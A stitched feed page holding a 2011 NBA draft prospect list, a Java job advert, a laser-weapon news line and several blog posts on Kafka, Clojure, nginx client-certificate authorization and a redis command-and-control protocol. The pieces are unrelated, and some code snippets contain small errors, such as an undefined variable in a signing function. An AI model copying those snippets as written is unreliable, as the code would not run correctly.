3. Jonas Valanciunas - 1992 C, Lietuvos Rytas
Range: 4-11 --- Most likely: Cavaliers, Pistons

4. Enes Kanter - 1992 PF/C, Kentucky
Range: 3-8 --- Most likely: Cavaliers, Wizards

5. Kemba Walker - Jr. PG, Connecticut
Range: 3-8 --- Most likely: Raptors, Kings

6. Jan Vesely - 1990 SF/PF, KK Partizan Belgrade
Range: 3-9 --- Most likely: Jazz, Wizards

7. Alec Burks - So. SG, Colorado
Range: 9-17 --- Most likely: Bucks, Knicks

Tier 4:
8. Brandon Knight - Fr. PG/SG, Kentucky
Range: 3-7 --- Most likely: Jazz, Raptors

9. Donatas Motiejunas - 1990 PF/C, Benetton Treviso
Range: 10-22 --- Most likely: Rockets, Sixers

10. Bismack Biyombo - 1992 PF/C, Baloncesto Fuenlabrada
Range: 5-17 --- Most likely: Pistons, Warriors, Rockets

11. Tristan Thompson - Fr. PF, Texas
Range: 6-16 --- Most likely: Pistons, Bobcats, Suns

Tier 5:
12. Chris Singleton - Jr. SF/PF, Florida State
Range: 7-16 --- Most likely: Bobcats, Warriors, Jazz

13. Marcus Morris - Jr. PF/SF, Kansas
Range: 8-15 --- Most likely: Bobcats, Bucks, Suns

14. Kawhi Leonard - So. SF, San Diego State
Range: 5-12 --- Most likely: Wizards, Kings

15. Tobias Harris, Fr. SF/PF, Tennessee
Range: 9-27 --- Most likely: Suns, Bobcats

16. Markieff Morris - Jr. PF, Kansas
Range: 9-22 --- Most likely: Suns, Sixers, Bobcats

17. Marshon Brooks - Sr. SG, Providence
Range: 10-20 --- Most likely: Bucks, Jazz, Knicks

18. Reggie Jackson - Jr. SG/PG, Boston College
Range: 18-31 --- Most likely: Celtics, Heat

19. Jimmer Fredette - Sr. PG/SG, Brigham Young
Range: 7-17 --- Most likely: Kings, Suns, Pacers

20. Kenneth Faried - Sr. PF/C, Morehead State
Range: 13-25 --- Most likely: Pacers, Wizards, Nuggets

Tier 6:
21. Justin Harper - Sr. PF/SF, Richmond
Range: 19-35 --- Most likely: Mavericks, Spurs, Kings

22. E’Twaun Moore - Sr. SG, Purdue
Range: 24-Undrafted

23. Nikola Mirotic - 1990 PF, Real Madrid
Range: 21-38

24. JaJuan Johnson - Sr. PF, Purdue
Range: 20-45

25. Jordan Hamilton - So. SF/SG, Texas
Range: 9-23 --- Most likely: Suns, Sixers, Bobcats

26. Tyler Honeycutt - So. SF/SG, UCLA
Range: 23-40 --- Most likely: Rockets, Celtics

27. Darius Morris - So. PG/SG, Michigan
Range: 21-41

28. Nikola Vucevic - Jr. C, USC
Range: 14-25 --- Most likely: Rockets, Sixers, Blazers

29. Jimmy Butler - Sr. SF, Marquette
Range: 23-37

30. Klay Thompson - Jr. SG/SF, Washington State
Range: 9-23 --- Most likely: Bucks, Suns, Rockets

Tier 7:
31. Josh Selby - Fr. SG/PG, Kansas
Range: 27-46

32. Jeremy Tyler - 1991 C/PF, Tokyo Apache
Range: 17-39 --- Most likely: Portland, Boston

33. Travis Leslie - Jr. SG, Georgia
Range: 25-46

34. Davis Bertans - 1992 SF, Union Olimpija Ljubljana
Range: 23-35

35. Bojan Bogdanovic - 1989 SG/SF, Cibona VIP Zagreb
Range: 31-Undrafted

36. Charles Jenkins - Sr. PG/SG, Hofstra
Range: 21-41

37. Kyle Singler - Sr. SF/PF, Duke
Range: 24-46

38. Isaiah Thomas, Jr. PG/SG, Washington
Range: 28-Undrafted

39. Demetri McCamey - Sr. PG, Illinois
Range: 31-Undrafted

40. Cory Joseph - Fr. PG, Texas
Range: 21-Undrafted

41. Norris Cole - Sr. PG, Cleveland State
Range: 21-51

42. Nolan Smith - Sr. PG/SG, Duke
Range: 31-51

43. Jon Leuer - Sr. PF/C, Wisconsin
Range: 25-57

44. Iman Shumpert - Jr. SG, Georgia Tech
Range: 13-34 --- Most likely: Suns, Knicks, Nuggets

45. DeAndre Liggins - Jr. SG/SF, Kentucky
Range: 31-Undrafted
          Senior Java Developer / Methods Business and Digital Technology Limited / Exeter, Devon, United Kingdom   
Methods Business and Digital Technology Limited/Exeter, Devon, United Kingdom

Senior Java Developer

£45,000- £55,000

Permanent

Exeter

An exciting and buzzing company are seeking a Software Engineer to join them, you'll be a key member of the engineering team of this fast growing company.

This is an excellent role for career development, as, being a small team, you will have the opportunity to be involved in every component of this ever growing business, developing all areas of your skill set.

Their SAAS platform is built with numerous tools, from MySQL to ElasticSearch, Java so from the Back End systems, Front End technologies, mobile applications the APIs and the tools and technologies that keep it all humming you'll get to be involved in it all.

By working closely with your engineering colleagues as well as the product team to develop new functionality, to generate new business ideas and to build a better, scaleable, platform for the future.

About you

You are a software engineering pro. You design beautiful technology which solves real business problems. You are happiest working on the technology that powers the business, from Back End code through to infrastructure and data storage and processing. You understand the complexities of the stack and strive to improve things (with consistently high quality code), great testing and get a kick out of doing things correctly.

You're a first rate and intelligent problem solver. Ensuring you solve said problems in order of business value. You have a proven experience of designing applications with production-strength, high traffic architectures and possess an understanding of complicated SaaS platforms with high availability.

In an ideal world, you'll have some experience in (AWS) or an alternative cloud platform. You're comfortable on the command line and adept at using the tools which are part and parcel of a modern fast paced software development environment, so naturally Git and Jenkins are essential tools for you.

This role is perfect for you if:

You are seeking a role in which you can get involved in major product and technology decisions from the outset, and help grow exciting business.

What's on offer:

An excellent, friendly and hardworking team, but the kind of team that are sociable and collaborative

Opportunities to grow and develop your career

A challenging and fast paced environment (the good kind of challenging) with good growth

Salary of £45-55k

Qualifications & skills

It is essential that you have an advanced knowledge of the following:

In-depth understanding of the entire development process (design, development and deployment)

4+ years of experience as a full-stack developer in commercial web and mobile development environments

Full-stack Java development experience, encompassing broad exposure to HTML, CSS, Javascript and other Front End frameworks

Strong with browser testing and debugging

SQL, RESTful web services, Spring, Hibernate experience

Eclipse/Maven/Tomcat/Git experience

JUnit, Selenium or similar

Experience in Agile development (ideally SCRUM)

Desired Technical Skills & Awareness:

Distributed architecture skills and capabilities, ideally cloud environments

Exposure to no-SQL or document persistence layer technologies

Experience of working with Lucene, ElasticSearch, SOLR, Hadoop or other indexing/caching solutions

Angular/Ember or alternative frameworks

Apache Wicket

Strong understanding of layout aesthetics

Knowledge of SEO principles

Don't hesitate to apply or send your CV directly to Laura Dinnage today, and we can have an informal/confidential discussion from there.

Employment Type: Permanent

Pay: 45,000 to 55,000 GBP (British Pound)
Pay Period: Annual

Apply To Job
          US Army fires laser 'cannon' from helicopter   
High-energy laser weapon developed with Raytheon tested on board Apache AH-64. - Source: optics.org
          Hands on Kafka: Dynamic DNS   

I recently wrote about kafka log compaction and the use cases it allows. The article focused on simple key-value storage and did not address going beyond this. In practice, values associated with keys often need more than just bare values.

To see how log compaction can still be leveraged with more complex types, we will see how to approach maintaining the state of a list in kafka through the lens of a dynamic DNS setup.

DNS: the 30 second introduction

I assume my readers are familiar with the architecture of the Domain Name System (DNS). To summarize, DNS revolves around the notions of zones, separated by dots which follow a tree like hierachy starting at the right-most zone.

Hierarchy

Each zone is responsible for maintaining a list of records. Records each have a type and an associated payload. Here’s a non-exhaustive list of record types:

Record Content


SOA Start of Authority. Provides zone details and timeouts. NS Delegates zone to other nameservers. A Maps a record to an IPv4 address. AAAA Maps a record to an IPv6 address. CNAME Aliases a record to another. MX Mail server responsibility for a record. SRV Arbitrary service responsibility for a record. TXT Arbitrary text associated with record. PTR Maps an IP record with a zone.

Given this hierarchy and properties, DNS can be abstracted to a hash table, keyed by zone. Value contents can be considered lists.

{
  "exoscale.com": [
    {record: "api", type: "A", content: "10.0.0.1"},
    {record: "www", type: "A", content: "10.0.0.2"},
  ],
  "google.com": [
    {record: "www", type: "A", content: "10.1.0.1"}
  ]
}

In reality, zone contents are stored in zone files, whose content look roughly like this:

$TTL  86400 
$ORIGIN example.com.
@  1D  IN  SOA ns1.example.com. hostmaster.example.com. (
               2015042301 ; serial
               3H ; refresh
               15 ; retry
               1w ; expire
               3h ; minimum
               )
IN  NS  ns1.example.com.     ; nameserver
IN  NS  ns2.example.com.     ; nameserver
IN  MX  10 mail.example.com. ; mail provider
; server host definitions
ns1    IN  A      10.0.0.1
ns1    IN  A      10.0.0.2
mail   IN  A      10.0.0.10
www    IN  A      10.0.0.10
api    IN  CNAME  www

Based on our mock list content above, generating a correct DNS zone file is a simple process.

Dynamic DNS motivation

Dynamic DNS updates greatly help when doing any of the following:

  • Automated zone synchronisation based on configuration management.
  • Automated zone synchronisation based on IaaS content.
  • Authorized and authenticated programmatic access to zone contents.

Most name servers support fast reloads and convergence of configuration, but still require generating zone files on the fly and reloading configuration. Kafka can be a very valid choice to maintain a stream of changes to zones.

Storing zone changes in Kafka

Updates to DNS zone usually trickle in as invidual record changes. An evident candidate for topic keys is the actual zone name. As far as changes are concerned it makes sense to store the individual record changes, not the whole zone on each change. Kafka payloads could thus be standard operations on lists:

Operation Effect


ADD Create a record SET Update a record DEL Delete a record

Each operation modifies the state of the list and reading from the head of a log for a particular key ensures that a correct, up to date version of a zone can be recreated:

Topic

Taking advantage of log compaction

While this is fully functional, the only correct compaction method for the above approach is time based, and requires reading from the head of the log. A simple way to address this issue is to create a second topic, meant to hold full zone snapshots, associated with the offset at which the snapshot was done. This allows to use log compaction on the snapshot topic.

With this approach, starting a consumer from scratch only requires two operations:

  • Read the snapshot log from its head.
  • Read the update log, only considering entries which are more recent than the associated snapshot time.

Dual Topic

For this approach to work, a single property must remain true: snapshots emitted on the snapshot topic should be more frequent than the expiration on the update topic.

Similar use-cases

Beyond DNS, this approach is valid for all standard compound types and their operations:

  • Stacks: push, pop
  • Lists: add, del, set
  • Maps: set, unset
  • Sets: add, del

          Simple materialized views in Kafka and Clojure   

A hands-on dive into Apache Kafka to build a scalable and fault-tolerant persistence layer.

With its most recent release, Apache Kafka introduced a couple of interesting changes, not least of which is Log Compaction, in this article we will walk through a simplistic use case which takes advantage of it.

Log compaction: the five minute introduction.

I won’t extensively detail what log compaction is, since it’s been thoroughly described. I encourage readers not familiar with the concept or Apache Kafka in general to go through these articles which give a great overview of the system and its capabilities:

In this article we will explore how to build a simple materialized view from the contents of a compacted kafka log. A working version of the approach described here can be found at https://github.com/pyr/kmodel and may be used as a companion while reading the article.

If you’re interested in materialized views, I warmly recommend looking into Apache Samza and this Introductory blog-post by Martin Kleppmann.

Overall architecture

For the purpose of this experiment, we will consider a very simple job board application. The application relies on a single entity type: a job description, and either does per-key access or retrieves the whole set of keys.

Our application will perform every read from the materialized view in redis, while all mutation operation will be logged to kafka.

log compaction architecture

In this scenario all components may be horizontally scaled. Additionaly the materialized view can be fully recreated at any time, since the log compaction ensures that at least the last state of all live keys are present in the log. This means that by starting a read from the head of the log, a consistent state can be recreated.

Exposed API

A mere four rest routes are necessary to implement this service:

  • GET /api/job: retrieve all jobs and their description.
  • POST /api/job: insert a new job description.
  • PUT /api/job/:id: modify an existing job description.
  • DELETE /api/job/:id: remove a job description.

We can map this REST functionality to a clojure protocol - the rough equivalent of an interface in OOP languages - with a mere 4 signatures:

(defprotocol JobDB
  "Our persistence protocol."
  (add! [this payload] [this id payload] "Upsert entry, optionally creating a key")
  (del! [this id] "Remove entry.")
  (all [this] "Retrieve all entries."))

Assuming this protocol is implemented, writing the HTTP API is relatively straightforward when leveraging tools such as compojure in clojure:

(defn api-routes
  "Secure, Type-safe, User-input-validating, Versioned and Multi-format API.
   (just kidding)"
  [db]
  (->
   (routes
    (GET    "/api/job"     []           (response (all db)))
    (POST   "/api/job"     req          (response (add! db (:body req))))
    (PUT    "/api/job/:id" [id :as req] (response (add! db id (:body req))))
    (DELETE "/api/job/:id" [id]         (response (del! db id)))
    (GET    "/"            []           (redirect "/index.html"))

    (resources                          "/")
    (not-found                          "<html><h2>404</h2></html>"))

   (json/wrap-json-body {:keywords? true})
   (json/wrap-json-response)))

I will not describe the client-side javascript code used to interact with the API in this article, it is a very basic AngularJS application.

Persistence layer

Were we to use redis exclusively, the operation would be quite straightforward, we would rely on a redis set to contain the set of all known keys. Each corresponding key would contain a serialized job description.

In terms of operations, this would mean:

  • Retrieval, would involve a SMEMBERS of the jobs key, then mapping over the result to issue a GET.
  • Insertions and updates could be merge into a single “Upsert” operation which would SET a key and would then add the key to the known set through a SADD command.
  • Deletions would remove the key from the known set through a SREM command and would then DEL the corresponding key.

Let’s look at an example sequence of events

log compaction events

As it turns out, it is not much more work when going through Apache Kafka.

  1. Persistence interaction in the API

    In the client, retrieval happens as described above. This example code is in the context of the implementation - or as clojure would have it reification - of the above protocol.

    (all [this]
      ;; step 1. Fetch all keys from set
      (let [members (redis/smembers "jobs")] 
         ;; step 4. Merge into a map
         (reduce merge {}      
           ;; step 2. Iterate on all keys
           (for [key members]  
             ;; step 3. Create a tuple [key, (deserialized payload)]
             [key (-> key redis/get edn/read-string)]))))
    

    The rest of the operations emit records on kafka:

    (add! [this id payload]
      (.send producer (record "job" id payload)))
    (add! [this payload]
      (add! this (random-id!) payload))
    (del! [this id]
      (.send producer (record "job" id nil))))))
    

    Note how deletions just produce a record for the given key with a nil payload. This approach produces what is called a tombstone in distributed storage systems. It will tell kafka that prior entries can be discarded but will keep it for a configurable amount of time to ensure coordination across consumers.

  2. Consuming persistence events

    On the consumer side, the approach is as described above

    (defmulti  materialize! :op)
    
    (defmethod materialize! :del
      [payload]
      (r/srem "jobs" (:key payload))
      (r/del (:key payload)))
    
    (defmethod materialize! :set
      [payload]
      (r/set (:key payload) (pr-str (:msg payload)))
      (r/sadd "jobs" (:key payload)))
    
    (doseq [payload (messages-in-stream {:topic "jobs"})]
      (let [op (if (nil? (:msg payload) :del :set))]
        (materialize! (assoc payload :op op))))
    

Scaling strategy and view updates

Where things start to get interesting, is that with this approach, the following becomes possible:

  • The API component is fully stateless and can be scaled horizontally. This is not much of a break-through and is usually the case.
  • The redis layer can use a consistent hash to shard across several instances and better use memory. While this is feasible in a more typical scenario, re-sharding induces a lot of complex manual handling. With the log approach, re-sharding only involves re-reading the log.
  • The consumer layer may be horizontally scaled as well

Additionally, since a consistent history of events is available in the log, adding views which generate new entities or ways to look-up data now only involve adapating the consumer and re-reading from the head of the log.

Going beyond

I hope this gives a good overview of the compaction mechanism. I used redis in this example, but of course, materialized views may be created on any storage backends. But in some cases even this is unneeded! Since consumers register themselves in zookeeper, they could directly expose a query interface and let clients contact them directly.


          Easy clojure logging set-up with logconfig   

*TL;DR*: I love clojure.tools.logging, but setting JVM logging up can be a bit frustrating, I wrote logconfig to help.

When I started clojure development (about 5 years ago now), I was new to the JVM - having no real Java background. My first clojure projects where long running, data consuming tasks and thus logging was a consideration from the start. The least I could say is that navigating the available logging options and understanding how to configure each framework was daunting.

JVM logging 101

Once you get around to understanding how logging works on the JVM, it makes a log of sense, for those not familiar with the concepts, here is a quick recap - I will be explaining this in the context of log4j, but the same holds for slf4j, logback and other frameworks:

  • Logging frameworks can be configured inside or outside the application.
  • The common method is for logging to be configured outside, with a specific configuration file.
  • User-provided classes can be added to the JVM to format (through layout) or write (through appenders) logs in a different manner.

This proves really useful, since you might need to ship logs as JSON-formatted payloads to integrate with your logstash infrastructure for instance, you might even rely on sending logs over the network, without the original application writer having had to worry about these use-cases.

The meat of the problem

While having the possibility of configuring logging in such a way, it’s not a use case many people have, and spreading an application’s configuration through-out several files does not facilitate starting out.

I think elasticsearch is a project which gets things right, allowing logging to be configured from the same file than the rest of the service, only exposing the most common options.

Introducing logconfig

logconfig, which is available on clojars (at version 0.7.1 at the time of writing), provides you with a simple way of taking care of that problem, it does the following things:

  • Provide a way to configure log4j from a clojure map.
  • Allow overriding of the configuration for people wanting to provide their own log4j.properties config.
  • Support both enhanced patterns and JSON event as layouts, enabling easy integration with logstash.
  • Append files with a time based rolling policy
  • Optional console output (for people using runit or debug purposes).

A nice side-effect of relying on logconfig is the reduced coordinates matrix:

;; before
  :dependencies [...
                 [commons-logging/commons-logging "1.2"]
                 [org.slf4j/slf4j-log4j12 "1.7.7"]
                 [net.logstash.log4j/jsonevent-layout "1.7"]
                 [log4j/apache-log4j-extras "1.2.17"]
                 [log4j/log4j "1.2.17"
                   :exclusions [javax.mail/mail
                                javax.jms/jms
                                com.sun.jdmk/jmxtools
                                com.sun.jmx/jmxri]]]
;; after
  :dependencies [...
                 [org.spootnik/logconfig "0.7.1"]]

Sample use-case: fleet

fleet, our command and control framework at exoscale is configured through a YAML file, the file is read and contains several sections: transport, codec, scenarios, http, security and logging.

logging:
  console: true
  files:
    - "/var/log/fleet.log"
security:
  ca-priv: "doc/ca/ca.key"
  certdir: "doc/ca"
  suffix: "pem"
scenarios:
  path: "doc/scenarios"
http:
  port: 8080
  origins:
    - "http://example.com"

The logging key in the YAML file is expected to adhere to logconfig’s format and will be fed to logconfig. Users relying on existing log4j.properties configuration can also set external to true in the YAML config and provide their log4j configuration through the standard JVM properties.

Both cyanite and pithos now also rely on this mechanism.

I hope this can be useful to other developers building services, apps and daemons in clojure, the full documentation for the API is available here: http://pyr.github.io/logconfig, check-out the project at https://github.com/pyr/logconfig.


          Beyond SSL client cert authentication: authorization   

In a previous article, I tried to make the case for using a private certificate authority to authenticate access to internal tools with SSL client certificates.

This approach is perfect to secure access to the likes of kibana, riemann-dash, graphite or similar tools.

If you start depending more and more on client-side certificates, you’re bound to reach the point when you need to tackle authorization as well.

While well-known, it is perfectly feasible to do so while keeping your private CA as a single source of internal user management.

I will be assuming a private CA authenticates clients for sites accessing app.priv.example.com and that three SSL client certificates exist: alice.users.example.com, bob.users.example.com, charlie.users.example.com (as mentionned above, see here for a quick way to get up and running).

Now since our certificates bear the names of clients what we need to do is retrieve the certificate’s name. Assuming that you have a web application exposed through HTTP which nginx proxies over to, here are the relevant bits that need to be added.

proxy_set_header X-Client-Verify $ssl_client_verify;
proxy_set_header X-Client-DN $ssl_client_s_dn;
proxy_set_header X-SSL-Issuer $ssl_client_i_dn;

Let’s go over them one by one:

  • $ssl_client_verify: Can be set to SUCCESS, FAILED or NONE.
  • $ssl_client_s_dn: Will be set to the Subject DN of the client cert.
  • $ssl_client_i_dn: Will be set to the Issuer DN of the client cert.

As far as configuration is concerned, this is all that is needed. There are more variables that you can tap into if necessary refer to the nginx http_ssl module documentation for an exhaustive list. If you rely on the apache webserver, similar environment variables are available as documented here.

Within applications, you’ll receive the identity of clients in this format and can thus be retrieved with a regexp:

CN=bob.users.example.com

It’s now dead simple to tie in to your application. Here is a simple ring middleware which attaches the calling user to incoming requests.

(defn wrap-ssl-client-auth [handler]
  (fn [request]
    (let [ssl_cn   (get-in request [:headers "X-Client-DN"])
          [_ user] (re-find #"CN=(.*)\.users\.example\.com$" ssl_cn)]
      (handler (assoc request :user user)))))

          Poor man's dependency injection in Clojure   

When writing daemons in clojure which need configuration, you often find yourself in a situation where you want to provide users with a way of overriding or extending some parts of the application.

All popular daemons provide this flexibility, usually through modules or plugins. The extension mechanism is a varying beast though, lets look at how popular daemons work with it.

  • nginx.org , written in C, uses a function pointer structure that needs to be included at compile time. Modules are expected to bring in their own parser extensions for the configuration file.

  • collectd, written in C uses function pointer structures as well but allows dynamic loading through ld.so. Additionally, the exposed function are expected to work with a pre-parsed structure to configure their behavior

  • puppet, written in Ruby, lets additional module reopen the puppet module to add functionality

  • cassandra, written in Java parses a YAML configuration file which specifies classes which will be loaded to provide a specific functionality

While all these approaches are valid, Cassandra’s approach most closely ressembles what you’d expect a clojure program to provide since it runs on the JVM. That particular type of behavior management - while usually being defined in XML files, since it is so pervasive in the Java community - is called Dependency Injection.

Dependency injection on the JVM

The JVM brings two things which simplify creating a daemon with configurable behavior:

  • Interfaces let you define a contract an object must satisfy
  • Classpaths let you add code to a project at run-time (not build-time)

Cassandra’s YAML configuration takes advantage of these two properties to let you swap implementation for different types of authenticators, snitches or partitioners.

A lightweight approach in clojure

So let’s mimick cassandra and write a simple configuration file which allows modifying behavior.

Let’s pretend we have a daemon which listens for data through transports, and needs to store it using a storage mechanism. A good example would be a log storage daemon, listening for incoming log lines, and storing them somewhere.

For such a daemon, the following “contracts” emerge:

  • transports: which listen for incoming log lines
  • codecs: which determine how data should be de-serialized
  • stores: which provide a way of storing data

This gives us the following clojure protocols:

(defprotocol Store
  (store! [this payload]))

(defprotocol Transport
  (listen! [this sink]))

(defprotocol Codec
  (decode [this payload]))

(defprotocol Service
  (start! [this]))

This gives you the ability to build an engine which has no knowledge of underlying implementation and can be very easily tested and inspected:

(defn reactor
  [transports codec store]
  (let [ch  (chan 10)]
    (reify
      Service
      (start! [this]
        (go-loop []
          (when-let [msg (<! ch)]
            (store! store (decode codec msg))
              (recur)))
        (doseq [transport transports]
          (start! transport)
          (listen! transport sink))))))

As shown above, we use reify to create an instance of an object honoring a specific protocol (or Java interface).

Here are simplistic implementations of an EDN codec, an stdout store and an stdin transport:

(defn edn-codec [config]
  (reify Codec
    (decode [this payload]
      (read-string payload))))

(defn stdout-store [config]
  (reify
    Store
    (store! [this payload]
      (println "storing: " payload))))

(defn stdin-transport [config]
  (let [sink (atom nil)]
    (reify
      Transport
      (listen! [this new-sink]
        (reset! sink new-sink))
      Service
      (start!
        (future
          (loop []
            (when-let [input (read-line)]
              (>!! @sink input)
              (recur))))))))

Note that each implementation gets passed a configuration variable - which will be useful.

A yaml configuration

Now that we have our protocols in place let’s see if we can come up with a sensible configuration file for our mock daemon:

codec:
  use: mock-daemon.codec/edn-codec
transports:
  stdin:
    use: mock-daemon.transport.stdin/stdin-transport
store:
  use: mock-daemon.transport.stdin/stdout-store

Our config contains three keys. codec and store are maps containing at least a use key which points to a symbol that will yield an instance of a class implementing the Codec or Store protocol.

Now all that remains to be done is having an an easy way to load this configuration and produce a codec, transports and stores from it.

Clojure introspection

Parsing the above configuration from yaml, with for instance clj-yaml.core/parse-string, will yield a map, if we only look at the codec part we would have:

{:codec {:use "mock-daemon.codec/edn-codec"}}

Our goal will be to retrieve an instance reifying Codec from the string mock-daemon.codec/edn-codec.

This can be done in two steps:

  • Retrieve the symbol
  • Call out the function

To retrieve the symbol, this simple bit will do:

(defn find-ns-var
  [candidate]
  (try
    (let [var-in-ns  (symbol candidate)
          ns         (symbol (namespace var-in-ns))]
      (require ns)
      (find-var var-in-ns))
    (catch Exception _)))

We first extract the namespace out of the namespace qualified var and require it, then get the var. Any errors will result in nil being returned.

Now that we have the function, it’s straightforward to call it with the config:

(defn instantiate
  [candidate config]
  (if-let [reifier (find-ns-var candidate)]
    (reifier config)
    (throw (ex-info (str "no such var: " candidate) {}))))

We can now tie these two functions:

(defn get-instance
  [config]
  (let [candidate (-> config :use name symbol)
        raw-config (dissoc config :use)]
    (instantiate candidate raw-config)))

These three snippets are the only bits of introspection you’ll need and are the core of our solution.

Tying it together

We can now make use of get-instance in our configuration loading code:

(defn load-path
  [path]
  (-> (or path
          (System/getenv "CONFIGURATION_PATH")
          "/etc/default_path.yaml")
      slurp
      parse-string))

(defn get-transports
  [transports]
  (zipmap (keys transports)
          (mapv get-instance (vals transports))))

(defn init
  [path]
  (try
    (-> (load-path path)
        (update-in [:codec] get-instance)
        (update-in [:store] get-instance)
        (update-in [:transports] get-transports))))

Using it from your main function

Now that all elements are there, starting up the daemon ends up only creating the configuration and working with protocols by calling our previous reactor function.

(defn main
  [& [config-file]]
  (let [config     (config/init config-file)
        codec      (:codec config)
        store      (:store config)
        transports (:transports config)
        reactor    (reactor transports codec store)]
    (start! reactor)))

By having reactor decoupled from the implementations of transports, codecs and the likes, testing the meat of the daemon becomes dead simple; a reactor can be started with dummy transports, stores and codecs to validate its inner-workings.

I hope this gives a good overview of simple techniques for building daemons in clojure.


          Weekend project: Ghetto RPC with redis, ruby and clojure   

There’s a fair amount of things that are pretty much set on current architectures. Configuration management is handled by chef, puppet (or pallet, for the brave). Monitoring and graphing is getter better by the day thanks to products such as collectd, graphite and riemann. But one area which - at least to me - still has no obvious go-to solution is command and control.

There are a few choices which fall in two categories: ssh for-loops and pubsub based solutions. As far as ssh for loops are concerned, capistrano (ruby), fabric (python), rundeck (java) and pallet (clojure) will do the trick, while the obvious candidate in the pubsub based space is mcollective.

Mcollective has a single transport system, namely STOMP, preferably set-up over RabbitMQ. It’s a great product and I recommend checking it out, but two aspects of the solution prompted me to write a simple - albeit less featured - alternative:

  • There’s currently no other transport method than STOMP and I was reluctant to bring RabbitMQ into the already well blended technology mix in front of me.
  • The client implementation is ruby only.

So let me here engage in a bit of NIHilism and describe a redis based approach to command and control.

The scope of the tool would be rather limited and only handle these tasks:

  • Node discovery and filtering
  • Request / response mechanism
  • Asynchronous communication (out of order replies)

Enter redis

To allow out of order replies, the protocol will need to broadcast requests and listen for replies separately. We will thus need both a pub-sub mechanism for requests and a queue for replies.

While redis is initially an in-memory key value store with optional persistence, it offers a wide range of data structures (see the full list at http://redis.io) and pub-sub support. No explicit queue function exist, but two operations on lists provide the same functionality.

Let’s see how this works in practice, with the standard redis-client redis-cli and assuming you know how to run and connect to a redis server:

  1. Queue Example

    Here is how to push items on a queue named my_queue:

    redis 127.0.0.1:6379> LPUSH my_queue first
    (integer) 1
    redis 127.0.0.1:6379> LPUSH my_queue second
    (integer) 2
    redis 127.0.0.1:6379> LPUSH my_queue third
    (integer) 3
    

    You can now subsequently issue the following command to pop items:

    redis 127.0.0.1:6379> BRPOP my_queue 0
    1) "my_queue"
    2) "first"
    redis 127.0.0.1:6379> BRPOP my_queue 0
    1) "my_queue"
    2) "second"
    redis 127.0.0.1:6379> BRPOP my_queue 0
    1) "my_queue"
    2) "third"
    

    LPUSH as its name implies pushes items on the left (head) of a list, while BRPOP pops items from the right (tail) of a list, in a blocking manner, with a timeout argument which we set to 0, meaning that the action will block forever if no items are available for popping.

    This basic queue mechanism is the main mechanism used in several open source projecs such as logstash, resque, sidekick, and many others.

  2. Pub-Sub Example

    Queues can be subscribed to through the SUBSCRIBE command, you’ll need to open two clients, start by issuing this in the first:

    redis 127.0.0.1:6379> SUBSCRIBE my_exchange
    Reading messages... (press Ctrl-C to quit)
    1) "subscribe"
    2) "my_hub"
    3) (integer) 1
    

    You are now listening on the my_exchange exchange, issue the following in the second terminal:

    redis 127.0.0.1:6379> PUBLISH my_exchange hey
    (integer) 1
    

    You’ll now see this in the first terminal:

    1) "message"
    2) "my_hub"
    3) "hey"
    
  3. Differences between queues and pub-sub

    The pub-sub mechanism in redis, broadcasts to all subscribers and will not queue up data for disconnect subscribers, where-as queues will deliver to the first available consumer, but will queue up (in RAM, so make sure of your consuming ability)

Designing the protocol

With the following building blocks in place, a simple layered protocol can be designed offering the following functionality, offering the following workflow:

  • A control box broadcasts a requests with a unique ID (UUID), with a command and node specification
  • All nodes matching the specification reply immediately with a START status, indicating that the requests has been acknowledged
  • All nodes refusing to go ahead reply with a NOOP status
  • Once execution is finished, nodes reply with a COMPLETE status

Acknowledgments and replies will be implemented over queues, solely to demonstrate working with queues, using pub-sub for replies would lead to cleaner code.

If we model this around JSON, we can thus work with the following payloads, starting with requests:

request = {
  reply_to: "51665ac9-bab5-4995-aa80-09bc79cfb2bd",
  match: {
    all: false, /* setting to true matches all nodes */
    node_facts: {
      hostname: "www*" /* allowing simple glob(3) type matches */
    }
  },
  command: {
    provider: "uptime",
    args: { 
     averages: {
       shortterm: true,
       midterm: true,
       longterm: true
     }
    }
  }
}

START responses would then use the following format:

response = {
  in_reply_to: "51665ac9-bab5-4995-aa80-09bc79cfb2bd",
  uuid: "5b4197bd-a537-4cc7-972f-d08ea5760feb",
  hostname: "www01.example.com",
  status: "start"
}

NOOP responses would drop the sequence UUID not needed:

response = {
  in_reply_to: "51665ac9-bab5-4995-aa80-09bc79cfb2bd",
  hostname: "www01.example.com",
  status: "noop"
}

Finally, COMPLETE responses would include the result of command execution:

response = {
  in_reply_to: "51665ac9-bab5-4995-aa80-09bc79cfb2bd",
  uuid: "5b4197bd-a537-4cc7-972f-d08ea5760feb",
  hostname: "www01.example.com",
  status: "complete",
  output: {
    exit: 0,
    time: "23:17:20",
    up: "4 days, 1:45",
    users: 6,
    load_averages: [ 0.06, 0.10, 0.13 ]
  }
}

We essentially end up with an architecture where each node is a daemon while the command and control interface acts as a client.

Securing the protocol

Since this is a proof of concept protocol and we want implementation to be as simple as possible, a somewhat acceptable compromise would be to share an SSH private key specific to command and control messages amongst nodes and sign requests and responses with it.

SSL keys would also be appropriate, but using ssh keys allows the use of the simple ssh-keygen(1) command.

Here is a stock ruby snippet, gem which performs signing with an SSH key, given a passphrase-less key.

require 'openssl'

signature = File.open '/path/to/private-key' do |file|
  digest = OpenSSL::Digest::SHA1.digest("some text")
  OpenSSL::PKey::DSA.new(file).syssign(digest)
end

To verify a signature here is the relevant snippet:

require 'openssl'

valid? = File.open '/path/to/private-key' do |file|

  OpenSSL::PKey::DSA.new(file).sysverify("some text", sig)
end

This implements the common scheme of signing a SHA1 digest with a DSA key (we could just as well sign with an RSA key by using OpenSSL::PKey::RSA)

A better way of doing this would be to sign every request with the host’s private key, and let the controller look up known host keys to validate the signature.

The clojure side of things

My drive for implementing a clojure controller is integration in the command and control tool I am using to interact with a number of things.

This means I only did the work to implement the controller side of things. Reading SSH keys meant pulling in the bouncycastle libs and the apache commons-codec lib for base64:

(import '[java.security                   Signature Security KeyPair]
        '[org.bouncycastle.jce.provider   BouncyCastleProvider]
        '[org.bouncycastle.openssl        PEMReader]
        '[org.apache.commons.codec.binary Base64])
(require '[clojure.java.io :as io])


(def algorithms {:dss "SHA1withDSA"
                 :rsa "SHA1withRSA"})

;; getting a public and private key from a path
(def keypair (let [pem (-> (PEMReader. (io/reader "/path/to/key")) .readObject)]
               {:public (.getPublic pem)
                :private (.getPrivate pem)}))

(def keytype :dss)

(defn sign
  [content]
  (-> (doto (Signature/getInstance (get algorithms keytype))
        (.initSign (:private keypair))
        (.update (.getBytes str)))
      (.sign)
      (Base64/encodeBase64string)))

(defn verify
  [content signature]
